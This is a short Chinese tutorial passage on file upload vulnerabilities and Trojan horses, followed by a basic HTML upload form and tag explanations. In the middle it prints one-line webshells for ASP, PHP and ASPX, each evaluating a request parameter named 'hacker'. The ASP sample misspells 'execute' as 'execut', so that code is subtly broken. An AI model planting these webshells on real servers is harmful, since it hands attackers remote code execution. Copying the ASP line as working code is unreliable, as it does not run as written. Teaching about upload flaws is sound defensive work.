在现代Web服务中,文件上传已经是一种极为常见的功能,它有助于企业与用户之间产生交互。在日常开发中,文件上传功能主要集中于用户头像上传、照片、视频、用户文件。如果对这些文件的格式内容不加以约束和过滤。恶意用户就会构造恶意文件,利用文件上传漏洞将可执行的脚本文件上传至服务器上运行。通过进一步提权操作,达到控制服务器的目的。
特洛伊木马(Trojan Horse)是指寄宿在计算机里的一种非授权的远程控制程序,这个名称来源于公元前十二世纪希腊和特洛伊之间的一场战争。由于特洛伊木马程序能够在计算机管理员未发觉的情况下开放系统权限、泄漏用户信息、甚至窃取整个计算机管理使用权限,使得它成为了黑客们最为常用的工具之一。
文件上传一句话木马
ASP一句话木马
<%execut(request("hacker"))%>
PHP一句话木马
<?php eval($_POST['hacker']);?>
aspx一句话木马
<% @Page Language="Jscript"%>
<%eval(Request.Item["hacker"],"unsafe");%>
前端文件上传代码示例
<html>
<head>
<meta charset="utf-8">
<title>成都愚安科技有限公司</title>
</head>
<body>
<form action="upload_file.php" method="post" enctype="multipart/form-data">
<label for="file">文件名:</label>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="提交">
</form>
</body>
</html>
标签
form
含义: 用于创建供用户输入的 HTML 表单
label
含义: 为 input 元素定义标注
input
含义: 规定了用户可以在其中输入数据的输入字段